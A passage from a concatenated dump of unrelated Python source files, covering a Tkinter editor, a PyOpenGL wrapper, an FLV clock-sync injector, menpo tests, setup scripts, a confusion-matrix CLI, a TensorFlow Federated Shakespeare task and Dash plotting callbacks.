tool_bar.pack_forget()
show_toolbar = False
else :
text_editor.pack_forget()
status_bar.pack_forget()
tool_bar.pack(side=tk.TOP, fill=tk.X)
text_editor.pack(fill=tk.BOTH, expand=True)
status_bar.pack(side=tk.BOTTOM)
show_toolbar = True
def hide_statusbar():
global show_statusbar
if show_statusbar:
status_bar.pack_forget()
show_statusbar = False
else :
status_bar.pack(side=tk.BOTTOM)
show_statusbar = True
view.add_checkbutton(label='Tool Bar',onvalue=True, offvalue=0,variable = show_toolbar, image=tool_bar_icon, compound=tk.LEFT, command=hide_toolbar)
view.add_checkbutton(label='Status Bar',onvalue=1, offvalue=False,variable = show_statusbar, image=status_bar_icon, compound=tk.LEFT, command=hide_statusbar)
## color theme
def change_theme():
chosen_theme = theme_choice.get()
color_tuple = color_dict.get(chosen_theme)
fg_color, bg_color = color_tuple[0], color_tuple[1]
text_editor.config(background=bg_color, fg=fg_color)
count = 0
for i in color_dict:
color_theme.add_radiobutton(label = i, image=color_icons[count], variable=theme_choice, compound=tk.LEFT, command=change_theme)
count += 1
# -------------------------------------&&&&&&&& End main menu functinality&&&&&&&&&&& ----------------------------------
main_application.config(menu=main_menu)
#### bind shortcut keys
main_application.bind("<Control-n>", new_file)
main_application.bind("<Control-o>", open_file)
main_application.bind("<Control-s>", save_file)
main_application.bind("<Control-Alt-s>", save_as)
main_application.bind("<Control-q>", exit_func)
main_application.bind("<Control-f>", find_func)
main_application.mainloop() |
py | b414d8d3b62a637919cadd7df9dd7b40c65a59ee | '''OpenGL extension AMD.shader_stencil_export
This module customises the behaviour of the
OpenGL.raw.GL.AMD.shader_stencil_export to provide a more
Python-friendly API
Overview (from the spec)
In OpenGL, the stencil test is a powerful mechanism to selectively discard
fragments based on the content of the stencil buffer. However, facilites
to update the content of the stencil buffer are limited to operations such
as incrementing the existing value, or overwriting with a fixed reference
value.
This extension provides a mechanism whereby a shader may generate the
stencil reference value per invocation. When stencil testing is enabled,
this allows the test to be performed against the value generated in the
shader. When the stencil operation is set to GL_REPLACE, this allows a
value generated in the shader to be written to the stencil buffer directly.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/AMD/shader_stencil_export.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.AMD.shader_stencil_export import *
from OpenGL.raw.GL.AMD.shader_stencil_export import _EXTENSION_NAME
def glInitShaderStencilExportAMD():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
py | b414d926b62e0ac9433b46f39542f62df7a040a1 | """"
Helper program to inject absolute wall clock time into FLV stream for recordings
"""
import struct
import sys
import time
def make_ui8(num):
return struct.pack("B", num)
def make_ui32(num):
return struct.pack(">I", num)
def make_si32_extended(num):
ret = struct.pack(">i", num)
return ret[1:] + bytes([ret[0]])
def make_ui24(num):
ret = struct.pack(">I", num)
return ret[1:]
def make_ui16(num):
return struct.pack(">H", num)
def create_script_tag(name, data, timestamp=0):
payload = make_ui8(2) # VALUE_TYPE_STRING
payload += make_string(name)
payload += make_ui8(3) # VALUE_TYPE_OBJECT
for k, v in data.items():
payload += make_string(k)
payload += make_ui8(0) # VALUE_TYPE_NUMBER
payload += make_number(v)
payload += make_ui24(9) # End of object
tag_type = make_ui8(18) # 18 = TAG_TYPE_SCRIPT
timestamp = make_si32_extended(timestamp)
stream_id = make_ui24(0)
data_size = len(payload)
tag_size = data_size + 11
return b"".join(
[
tag_type,
make_ui24(data_size),
timestamp,
stream_id,
payload,
make_ui32(tag_size),
]
)
def make_string(string):
s = string.encode("UTF-8")
length = make_ui16(len(s))
return length + string.encode("UTF-8")
def make_number(num):
return struct.pack(">d", num)
def read_bytes(source, num_bytes):
read_bytes = 0
buf = b""
while read_bytes < num_bytes:
d_in = source.read(num_bytes - read_bytes)
if d_in:
read_bytes += len(d_in)
buf += d_in
else:
return buf
return buf
def write(data):
sys.stdout.buffer.write(data)
def main():
if sys.platform == "win32":
import msvcrt
import os
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
source = sys.stdin.buffer
header = read_bytes(source, 3)
if header != b"FLV":
print("Not a valid FLV file")
return
write(header)
# Skip rest of FLV header
write(read_bytes(source, 6))
i = 0
while True:
# Packet structure from Wikipedia:
#
# Size of previous packet uint32_be 0 For first packet set to NULL
# Packet Type uint8 18 For first packet set to AMF Metadata
# Payload Size uint24_be varies Size of packet data only
# Timestamp Lower uint24_be 0 For first packet set to NULL
# Timestamp Upper uint8 0 Extension to create a uint32_be value
# Stream ID uint24_be 0 For first stream of same type set to NULL
#
# Payload Data freeform varies Data as defined by packet type
header = read_bytes(source, 15)
if len(header) != 15:
write(header)
return
# Get payload size to know how many bytes to read
high, low = struct.unpack(">BH", header[5:8])
payload_size = (high << 16) + low
# Get timestamp to inject into clock sync tag
low_high = header[8:12]
combined = bytes([low_high[3]]) + low_high[:3]
timestamp = struct.unpack(">i", combined)[0]
if i % 3:
# Insert a custom packet every so often for time synchronization
# Reference based on flvlib:
# data = flv.libastypes.FLVObject()
# data["streamClock"] = int(timestamp)
# data["streamClockBase"] = 0
# data["wallClock"] = time.time() * 1000
# packet_to_inject = flvlib.tags.create_script_tag(
# "onClockSync", data, timestamp))
data = {
"streamClock": int(timestamp),
"streamClockBase": 0,
"wallClock": time.time() * 1000,
}
write(make_ui32(payload_size + 15)) # Write previous packet size
write(create_script_tag("onClockSync", data, timestamp))
# Write rest of original packet minus previous packet size
write(header[4:])
write(read_bytes(source, payload_size))
else:
# Write the original packet
write(header)
write(read_bytes(source, payload_size))
i += 1
if __name__ == "__main__":
main()
|
py | b414d945aa305c1a340ff1b469bd14502aa3d946 | import sys
workload = sys.argv[1]
bandwidth = sys.argv[2]
delay = sys.argv[3]
load = sys.argv[4]
protocol = sys.argv[5]
folder = "workload/dc_workload/all-to-all-144-"+workload
inpfilename = protocol+"-"+bandwidth+"G-"+delay+"ns-"+load+".stats"
outfilename = protocol+"-"+bandwidth+"G-"+delay+"ns-"+load+".out"
f = open(folder+"/"+inpfilename, "r")
out = open(folder+"/"+outfilename, "w")
out.write("Flow ID,"+"Src,"+"Dst,"+"Flow Size(bytes),"+"Flow Completion Time(secs),"+"Slowdown,"+"Throughput(Gbps)")
out.write("\n")
for line in f:
tokens = line.split()
if (tokens[0] != '##'):
flowid = int(tokens[0])
src = int(tokens[2])
dst = int(tokens[3])
flowsize = int(tokens[1])
fct = float(tokens[6])*1e-6
slowdown = float(tokens[8])
rate = (flowsize*8.0) / (fct*1e9)
if (slowdown < 1.0):
out.write("Problem,")
out.write(str(flowid)+","+str(src)+","+str(dst)+","+str(flowsize)+","+str(fct)+","+str(slowdown)+","+str(rate)+"\n")
f.close()
out.close()
|
py | b414d9c80384620cc2516c47ca1a502f8dc71378 | import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import assert_equals
import menpo.io as mio
from menpo.landmark import labeller, face_ibug_68_to_face_ibug_68
from menpo.image.base import (Image, _convert_patches_list_to_single_array,
_create_patches_image)
from menpo.shape import PointCloud
#######################
# EXTRACT PATCHES TESTS
#######################
def test_double_type():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.float64)
def test_float_type():
image = mio.import_builtin_asset('breakingbad.jpg')
image.pixels = image.pixels.astype(np.float32)
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.float32)
def test_uint8_type():
image = mio.import_builtin_asset('breakingbad.jpg', normalize=False)
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.uint8)
def test_uint16_type():
image = Image.init_blank([100, 100], dtype=np.uint16)
patch_shape = (16, 16)
landmarks = PointCloud(np.array([[50, 50.]]))
patches = image.extract_patches(landmarks,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.uint16)
def test_int_pointcloud():
image = Image.init_blank([100, 100])
patch_shape = (16, 16)
landmarks = PointCloud(np.array([[50, 50]]))
patches = image.extract_patches(landmarks,
patch_shape=patch_shape,
as_single_array=False)
assert(patches[0].pixels.dtype == np.float)
def test_uint8_type_single_array():
image = mio.import_builtin_asset('breakingbad.jpg', normalize=False)
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=True)
assert(patches.dtype == np.uint8)
def test_squared_even_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_squared_odd_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (15, 15)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_nonsquared_even_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 18)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_nonsquared_odd_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (15, 17)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_nonsquared_even_odd_patches():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (15, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_squared_even_patches_landmarks():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches_around_landmarks('PTS',
patch_shape=patch_shape,
as_single_array=False)
assert_equals(len(patches), 68)
def test_squared_even_patches_single_array():
image = mio.import_builtin_asset('breakingbad.jpg')
patch_shape = (16, 16)
patches = image.extract_patches(image.landmarks['PTS'].lms,
as_single_array=True,
patch_shape=patch_shape)
assert_equals(patches.shape, ((68, 1, 3) + patch_shape))
def test_squared_even_patches_sample_offsets():
image = mio.import_builtin_asset('breakingbad.jpg')
sample_offsets = np.array([[0, 0], [1, 0]])
patches = image.extract_patches(image.landmarks['PTS'].lms,
sample_offsets=sample_offsets,
as_single_array=False)
assert_equals(len(patches), 136)
#######################
# SET PATCHES TESTS
#######################
def test_single_ndarray_patch():
patch_shape = (21, 7)
n_channels = 4
im = Image.init_blank(patch_shape, n_channels)
patch = np.zeros((2, 2, n_channels) + patch_shape)
patch[1, 0, ...] = np.ones((n_channels,) + patch_shape)
patch[1, 1, ...] = 2 * np.ones((n_channels,) + patch_shape)
patch_center = PointCloud(np.array([[10., 3.], [11., 3.]]))
new_im = im.set_patches(patch, patch_center, offset=(0, 0), offset_index=1)
res = np.zeros(patch_shape)
res[1:-1, :] = 2
assert_array_equal(new_im.pixels[2, ...], res)
def test_single_list_patch():
patch_shape = (21, 7)
n_channels = 4
im = Image.init_blank(patch_shape, n_channels)
patch = [Image(np.ones((n_channels,) + patch_shape)),
Image(2 * np.ones((n_channels,) + patch_shape))]
patch_center = PointCloud(np.array([[10., 3.], [11., 3.]]))
new_im = im.set_patches(patch, patch_center, offset=(0, 0), offset_index=0)
res = np.ones(patch_shape)
res[1:-1, :] = 2
assert_array_equal(new_im.pixels[2, ...], res)
def test_offset_argument():
patch_shape = (5, 6)
offsets = [(0., 0.), [0., 0.], np.array([[1., 1.]]), None]
image = mio.import_builtin_asset('breakingbad.jpg')
patch_center = PointCloud(np.array([[100., 101.], [50., 41.]]))
patch = np.zeros((2, 1, image.n_channels) + patch_shape)
patch[0, 0, ...] = np.ones((image.n_channels,) + patch_shape)
patch[1, 0, ...] = 2 * np.ones((image.n_channels,) + patch_shape)
for off in offsets:
image = image.set_patches(patch, patch_center, offset=off)
assert_array_equal(image.pixels[:, 98:103, 98:104], patch[0, 0, ...])
assert_array_equal(image.pixels[:, 48:53, 38:44], patch[1, 0, ...])
def test_convert_patches_list_to_single_array():
patch_shape = (7, 2)
n_channels = 10
n_centers = 2
n_offsets = 2
patches_list = [Image(1 * np.ones((n_channels,) + patch_shape)),
Image(2 * np.ones((n_channels,) + patch_shape)),
Image(3 * np.ones((n_channels,) + patch_shape)),
Image(4 * np.ones((n_channels,) + patch_shape))]
patches_array = np.zeros((n_centers, n_offsets, n_channels) + patch_shape)
patches_array[0, 0, ...] = patches_list[0].pixels
patches_array[0, 1, ...] = patches_list[1].pixels
patches_array[1, 0, ...] = patches_list[2].pixels
patches_array[1, 1, ...] = patches_list[3].pixels
assert_array_equal(
_convert_patches_list_to_single_array(patches_list, n_centers),
patches_array)
def test_set_patches_around_landmarks():
patch_shape = (21, 12)
image = mio.import_builtin_asset.lenna_png()
patches1 = image.extract_patches_around_landmarks(
patch_shape=patch_shape, as_single_array=True)
new_image1 = Image.init_blank(image.shape, image.n_channels)
new_image1.landmarks['LJSON'] = image.landmarks['LJSON']
extracted1 = new_image1.set_patches_around_landmarks(patches1)
patches2 = image.extract_patches_around_landmarks(
patch_shape=patch_shape, as_single_array=False)
new_image2 = Image.init_blank(image.shape, image.n_channels)
new_image2.landmarks['LJSON'] = image.landmarks['LJSON']
extracted2 = new_image2.set_patches_around_landmarks(patches2)
assert_array_equal(extracted1.pixels, extracted2.pixels)
def test_create_patches_image():
patch_shape = (7, 14)
image = mio.import_builtin_asset.lenna_png()
patches = image.extract_patches_around_landmarks(
patch_shape=patch_shape, as_single_array=True)
pc = image.landmarks['LJSON'].lms
patches_image = _create_patches_image(patches, pc, patches_indices=range(17))
assert(patches_image.n_channels == patches.shape[2])
assert(patches_image.landmarks.n_groups == 2)
assert(patches_image.landmarks['selected_patch_centers'].lms.n_points == 17)
assert(patches_image.landmarks['all_patch_centers'].lms.n_points == 68)
|
py | b414db6aa11d2a9a5c8c532e207003d295d58683 | from setuptools import setup
from tilebeard.__init__ import __version__
setup(
name = 'tilebeard',
version = __version__,
description = 'A minimal WMTS adapter for web frameworks.',
url = 'https://github.com/olegsson/tilebeard',
author = 'olegsson',
author_email = '[email protected]',
license = 'MIT',
packages = ['tilebeard'],
zip_safe = True,
classifiers = [
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
]
)
|
py | b414dbfa5666599bd91d9e1fb6e7347402eccb51 | import os.path
import setuptools
import sys
from numpy.distutils.core import setup
from numpy.distutils.misc_util import Configuration
include_dirs = []
library_dirs = []
if sys.platform == 'win32':
# Update the ``library_dir_option`` function in MSVCCompiler
# to add quotes around /LIBPATH entries.
import types
def _lib_dir_option(self, dir):
return '/LIBPATH:"%s"' % dir
from distutils.msvc9compiler import MSVCCompiler
setattr(MSVCCompiler, 'library_dir_option',
types.MethodType(_lib_dir_option, None, MSVCCompiler))
sdkdir = os.environ.get('WindowsSdkDir')
if sdkdir:
include_dirs.append(os.path.join(sdkdir,'Include'))
library_dirs.append(os.path.join(sdkdir,'Lib'))
# make sure we have mt.exe available in case we need it
path = os.environ['PATH'].split(';')
path.append(os.path.join(sdkdir,'bin'))
os.environ['PATH'] = ';'.join(path)
config = Configuration(name='slsqp')
config.add_extension('slsqp',
sources=['*.f',
'f2py/slsqp.pyf'],
include_dirs=include_dirs,
library_dirs=library_dirs)
config.add_data_files('LICENSE','README')
kwds = {'install_requires':['numpy'],
'version': '1.0.2',
'zip_safe': False,
'license': 'permissive open source',
# NOTE: we use 'url' here, but it really translates to 'home-page'
# in the metadata. Go figure.
'url': 'http://www.pyopt.org',
'package_data': {'openmdao.main': ['*.html']},
}
kwds.update(config.todict())
setup(**kwds)
|
py | b414dc32951fd8eb7bdf4cb99d4db25644d6c0dd | import argparse
import csv
import traceback
from enum import Enum
from scm.matrix import ConfusionMatrix, MatrixType, load_csv
class OutputFormat(Enum):
"""
The types of output formats.
Argparse integration taken from here:
https://stackoverflow.com/a/55500795/4698227
"""
CSV = 1
PLAINTEXT = 2
def __str__(self):
return self.name.lower()
def __repr__(self):
return str(self)
@staticmethod
def argparse(s):
try:
return OutputFormat[s.upper()]
except KeyError:
return s
def generate(input_file, output_file, col_act, col_pred, col_weight=None, matrix_type=MatrixType.COUNTS,
delimiter=",", quotechar="\"", header=True, labels=None, prefix_act="a: ", prefix_pred="p: ", corner="x",
output_format=OutputFormat.CSV, max_decimals=3):
"""
Generates the confusion matrix from the CSV file. Outputs the result on stdout if no output file provided.
:param input_file: the CSV file to load actual/predicted labels from
:type input_file: str
:param output_file: the (optional) CSV file to write the matrix to
:type output_file: str
:param col_act: the 1-based index of the column that contains the actual/ground truth labels
:type col_act: int
:param col_pred: the 1-based index of the column that contains the predicted labels
:type col_pred: int
:param col_weight: the 1-based index of the (optional) column containing the weight (0-1) for the predictions, default is None
:type col_weight: int
:param matrix_type: the type of matrix to generate
:type matrix_type: MatrixType
:param delimiter: the delimiter to use for the CSV file
:type delimiter: str
:param quotechar: the quote character to use for the CSV file
:type quotechar: str
:param header: whether the CSV file has a header
:type header: bool
:param labels: the (optional) list of predefined labels to use
:type labels: list
:param prefix_act: the prefix to use for the the actual cells (left column)
:type prefix_act: str
:param prefix_pred: the prefix to use for the the predicted cells (top row)
:type prefix_pred: str
:param corner: the text to print in the top-left corner
:type corner: str
:param output_format: the format to use when writing to a file (csv|plaintext)
:type output_format: OutputFormat
:param max_decimals: the maximum decimals after the decimal point to use in case of float values, -1 for no restrictions
:type max_decimals: int
"""
actual, predicted, weight = load_csv(input_file, col_act, col_pred, col_weight=col_weight,
delimiter=delimiter, quotechar=quotechar, header=header)
matrix = ConfusionMatrix(actual, predicted, weight=weight, labels=labels,
actual_prefix=prefix_act, predicted_prefix=prefix_pred, corner=corner)
result = matrix.generate(matrix_type=matrix_type, max_decimals=max_decimals)
if output_file is None:
print(result.to_plaintext())
else:
with open(output_file, "w") as outputf:
if output_format == OutputFormat.CSV:
result.to_csv(output_file, delimiter=delimiter, quotechar=quotechar, quoting=csv.QUOTE_MINIMAL)
elif output_format == OutputFormat.PLAINTEXT:
outputf.write(result.to_plaintext())
else:
raise Exception("Unhandled output format: " + str(output_format))
def main(args=None):
"""
Performs the matrix generation.
Use -h to see all options.
:param args: the command-line arguments to use, uses sys.argv if None
:type args: list
"""
parser = argparse.ArgumentParser(
description='Generates a confusion matrix from a CSV file with actual/predicted label columns.',
prog="scm-generate",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-i", "--input", dest="input_file", metavar="FILE", required=True, help="the CSV file to load the actual/predicted labels from")
parser.add_argument("-d", "--delimiter", dest="delimiter", metavar="DELIMITER", required=False, default=",", help="the column delimited in the CSV file")
parser.add_argument("-q", "--quotechar", dest="quotechar", metavar="CHAR", required=False, default="\"", help="the quote character to use in the CSV file")
parser.add_argument("-H", "--no_header", action="store_false", dest="header", help="whether the CSV file has no header row")
parser.add_argument("-o", "--output", dest="output_file", metavar="FILE", required=False, help="the optional CSV file to write the generated matrix to")
parser.add_argument("-O", "--output_format", dest="output_format", metavar="FORMAT", required=False, default=OutputFormat.CSV, choices=list(OutputFormat), type=OutputFormat.argparse, help="the output format to use when writing to the output file")
parser.add_argument("-a", "--actual", dest="col_act", metavar="COL", required=False, default=1, type=int, help="the 1-based column index for the actual/ground truth labels")
parser.add_argument("-A", "--actual_prefix", dest="prefix_act", metavar="PREFIX", required=False, default="a: ", type=str, help="the prefix to use for the labels depicted in the 'actual' labels column")
parser.add_argument("-p", "--predicted", dest="col_pred", metavar="COL", required=False, default=2, type=int, help="the 1-based column index for the predicted labels")
parser.add_argument("-P", "--predicted_prefix", dest="prefix_pred", metavar="PREFIX", required=False, default="p: ", type=str, help="the prefix to use for the labels depicted in the 'predicted' labels row")
parser.add_argument("-w", "--weight", dest="col_weight", metavar="COL", required=False, default=None, type=int, help="the 1-based column index for the weight (0-1) of the predicted label")
parser.add_argument("-l", "--labels", dest="labels", metavar="LABELS", required=False, default=None, type=str, help="comma-separated list of predefined labels to use (eg if not all labels present in CSV file)")
parser.add_argument("-C", "--corner", dest="corner", metavar="CORNER", required=False, default="x", type=str, help="the text to print in the top-left corner")
parser.add_argument("-D", "--max_decimals", dest="max_decimals", metavar="NUM", required=False, default=3, type=int, help="the maximum number of decimals after the decimal point to use in case of float values like percentages")
parser.add_argument("-t", "--matrix_type", dest="matrix_type", metavar="TYPE", required=False, default=MatrixType.COUNTS, choices=list(MatrixType), type=MatrixType.argparse, help="the type of matrix to generate")
parsed = parser.parse_args(args=args)
labels = None if parsed.labels is None else parsed.labels.split(",")
generate(parsed.input_file, parsed.output_file, parsed.col_act, parsed.col_pred,
col_weight=parsed.col_weight, matrix_type=parsed.matrix_type,
delimiter=parsed.delimiter, quotechar=parsed.quotechar, header=parsed.header, labels=labels,
prefix_act=parsed.prefix_act, prefix_pred=parsed.prefix_pred, corner=parsed.corner,
output_format=parsed.output_format, max_decimals=parsed.max_decimals)
def sys_main():
"""
Runs the main function using the system cli arguments, and
returns a system error code.
:return: 0 for success, 1 for failure.
:rtype: int
"""
try:
main()
return 0
except Exception:
print(traceback.format_exc())
return 1
if __name__ == "__main__":
try:
main()
except Exception:
print(traceback.format_exc())
|
py | b414dc57843206ea22226c6c8e16cc0cc1e96f12 | from saturnv.api import configuration
if configuration.Defaults.model == configuration.Engines.postgres:
from saturnv.api.models import postgresql as model
if configuration.Defaults.repository == configuration.Engines.postgres:
from saturnv.api.repositories import postgresql as repository
if configuration.Defaults.engine == configuration.Engines.postgres:
from saturnv.api.databases import postgresql as database
|
py | b414dcc707a2aa298d291f60d3bb02a97ca42b86 | # Copyright 2019, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated Shakespeare next character prediction library using TFF."""
import functools
import tensorflow as tf
import tensorflow_federated as tff
from optimization.tasks import training_specs
from utils import keras_metrics
from utils.datasets import shakespeare_dataset
from utils.models import shakespeare_models
# Vocabulary with OOV ID, zero for the padding, and BOS, EOS IDs.
VOCAB_SIZE = len(shakespeare_dataset.CHAR_VOCAB) + 4
def create_shakespeare_model(sequence_length):
"""Constructs a `tf.keras.Model` to train."""
return shakespeare_models.create_recurrent_model(
vocab_size=VOCAB_SIZE, sequence_length=sequence_length)
def metrics_builder():
"""Returns a `list` of `tf.keras.metric.Metric` objects."""
pad_token, _, _, _ = shakespeare_dataset.get_special_tokens()
return [
keras_metrics.NumBatchesCounter(),
keras_metrics.NumExamplesCounter(),
keras_metrics.NumTokensCounter(masked_tokens=[pad_token]),
keras_metrics.MaskedCategoricalAccuracy(masked_tokens=[pad_token]),
]
def eval_metrics_builder():
pad_token, _, _, _ = shakespeare_dataset.get_special_tokens()
return [
tf.keras.metrics.SparseCategoricalCrossentropy(),
keras_metrics.MaskedCategoricalAccuracy(masked_tokens=[pad_token]),
]
def configure_training(task_spec: training_specs.TaskSpec,
sequence_length: int = 80) -> training_specs.RunnerSpec:
"""Configures training for the Shakespeare next-character prediction task.
This method will load and pre-process datasets and construct a model used for
the task. It then uses `iterative_process_builder` to create an iterative
process compatible with `federated_research.utils.training_loop`.
Args:
task_spec: A `TaskSpec` class for creating federated training tasks.
sequence_length: An int specifying the length of the character sequences
used for prediction.
Returns:
A `RunnerSpec` containing attributes used for running the newly created
federated task.
"""
shakespeare_train, _ = tff.simulation.datasets.shakespeare.load_data()
_, shakespeare_test = shakespeare_dataset.get_centralized_datasets(
sequence_length=sequence_length)
train_preprocess_fn = shakespeare_dataset.create_preprocess_fn(
num_epochs=task_spec.client_epochs_per_round,
batch_size=task_spec.client_batch_size,
sequence_length=sequence_length)
input_spec = train_preprocess_fn.type_signature.result.element
model_builder = functools.partial(
create_shakespeare_model, sequence_length=sequence_length)
loss_builder = functools.partial(
tf.keras.losses.SparseCategoricalCrossentropy, from_logits=True)
def tff_model_fn() -> tff.learning.Model:
return tff.learning.from_keras_model(
keras_model=model_builder(),
input_spec=input_spec,
loss=loss_builder(),
metrics=metrics_builder())
iterative_process = task_spec.iterative_process_builder(tff_model_fn)
@tff.tf_computation(tf.string)
def build_train_dataset_from_client_id(client_id):
client_dataset = shakespeare_train.dataset_computation(client_id)
return train_preprocess_fn(client_dataset)
training_process = tff.simulation.compose_dataset_computation_with_iterative_process(
build_train_dataset_from_client_id, iterative_process)
client_ids_fn = functools.partial(
tff.simulation.build_uniform_sampling_fn(
shakespeare_train.client_ids,
replace=False,
random_seed=task_spec.client_datasets_random_seed),
size=task_spec.clients_per_round)
# We convert the output to a list (instead of an np.ndarray) so that it can
# be used as input to the iterative process.
client_sampling_fn = lambda x: list(client_ids_fn(x))
training_process.get_model_weights = iterative_process.get_model_weights
evaluate_fn = tff.learning.build_federated_evaluation(tff_model_fn)
def test_fn(state):
return evaluate_fn(
iterative_process.get_model_weights(state), [shakespeare_test])
def validation_fn(state, round_num):
del round_num
return evaluate_fn(
iterative_process.get_model_weights(state), [shakespeare_test])
return training_specs.RunnerSpec(
iterative_process=training_process,
client_datasets_fn=client_sampling_fn,
validation_fn=validation_fn,
test_fn=test_fn)
|
py | b414dd2c8df02cd0d8412830132268d0840b7bdd | """
Module: 'uasyncio.funcs' on pyboard 1.13.0-95
"""
# MCU: (sysname='pyboard', nodename='pyboard', release='1.13.0', version='v1.13-95-g0fff2e03f on 2020-10-03', machine='PYBv1.1 with STM32F405RG')
# Stubber: 1.3.4
core = None
gather = None
wait_for = None
def wait_for_ms():
pass
|
py | b414ddb8a4a5ecf95b6f5e8d7903921be5256b33 | import dash
import plotly.graph_objects as go
from dash.dependencies import Input, Output, State
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dashboard import app_data
def _update_yaxis_range(xaxis_range, fig):
if fig is None or xaxis_range is None or "xaxis.range" not in xaxis_range:
return dash.no_update
# Get new range
begin, end = xaxis_range["xaxis.range"]
# Find max y in the new range
data = zip(fig["data"][0]["x"], fig["data"][0]["y"])
y_max = max([y for x, y in data if x >= begin and x <= end])
# Make sure range slider does not change range
fig["layout"]["xaxis"]["rangeslider"]["yaxis"]["range"] = [
min(fig["data"][0]["y"]) - 0.05 * max(fig["data"][0]["y"]),
1.05 * max(fig["data"][0]["y"]),
]
fig["layout"]["xaxis"]["rangeslider"]["yaxis"]["rangemode"] = "normal"
# Change range of graph
fig["layout"]["yaxis"]["range"][0] = 0 - 0.05 * y_max
fig["layout"]["yaxis"]["range"][1] = 1.05 * y_max
fig["layout"]["yaxis"]["autorange"] = False
return fig
def gen_col_plot_from_cases_callbacks(
x,
y,
initial_trigger_id,
parent_id,
app,
hovertemplate="<b>%{x}</b><br>%{y:,.2f}<extra></extra>"):
"""
Args:
x: x col name (should be date).
y: y col name.
initial_trigger_id: component ID that triggers initial rendering.
parent_id: component ID of the parent element.
app: dash.Dash instance.
"""
def _reder_plot(_):
cases = app_data.read_cases()
fig = go.Figure(data=[
go.Scatter(
x=pd.to_datetime(cases[x]),
y=cases[y],
hovertemplate=hovertemplate,
),
], )
fig.update_xaxes(rangeslider_visible=True, showspikes=True)
fig.update_yaxes(showspikes=True)
fig.layout.margin = go.layout.Margin(t=0, b=0, l=0, r=0)
return dcc.Graph(figure=fig,
config={
"displaylogo":
False,
"displayModeBar":
False,
"modeBarButtonsToRemove":
["toggleSpikelines", "autoScale2d"],
},
id=f"{parent_id:s}-graph")
return (
app.callback(
Output(parent_id, "children"),
Input(initial_trigger_id, "children"),
)(_reder_plot),
app.callback(
Output(f"{parent_id:s}-graph", "figure"),
Input(f"{parent_id:s}-graph", "relayoutData"),
State(f"{parent_id:s}-graph", "figure"),
)(_update_yaxis_range),
)
def _update_double_yaxis_range(xaxis_range, fig):
if fig is None or xaxis_range is None or "xaxis.range" not in xaxis_range:
return dash.no_update
# Get new range
begin, end = xaxis_range["xaxis.range"]
# Find max y in the new range
data = zip(fig["data"][0]["x"], fig["data"][0]["y"])
y_max1 = max([y for x, y in data if x >= begin and x <= end])
data = zip(fig["data"][1]["x"], fig["data"][1]["y"])
y_max2 = max([y for x, y in data if x >= begin and x <= end])
# Make sure range slider does not change range
for i, yaxis in enumerate(["yaxis", "yaxis2"]):
fig["layout"]["xaxis"]["rangeslider"][yaxis]["range"] = [
min(fig["data"][i]["y"]) - 0.05 * max(fig["data"][i]["y"]),
1.05 * max(fig["data"][i]["y"]),
]
fig["layout"]["xaxis"]["rangeslider"][yaxis]["rangemode"] = "normal"
# Change range of graph
fig["layout"]["yaxis"]["range"][1] = 1.05 * y_max1
fig["layout"]["yaxis"]["autorange"] = False
fig["layout"]["yaxis2"]["range"][1] = 1.05 * y_max2
fig["layout"]["yaxis2"]["autorange"] = False
return fig
def gen_2_cols_plot_from_cases_callbacks(
x,
y1,
y2,
y1_name,
y2_name,
initial_trigger_id,
parent_id,
app,
hovertemplate="<b>%{x}</b><br>%{y:,.2f}<extra></extra>"):
"""
Args:
x: x col name (should be date).
y1: y col name.
y2: the other y col name.
y1_name: y col display name.
y2_name: the other y col display name.
initial_trigger_id: component ID that triggers initial rendering.
parent_id: component ID of the parent element.
app: dash.Dash instance.
"""
cases = app_data.read_cases()
def _reder_plot(_):
fig = go.Figure(
data=[
go.Scatter(
x=pd.to_datetime(cases[x]),
y=cases[y1],
name=y1_name,
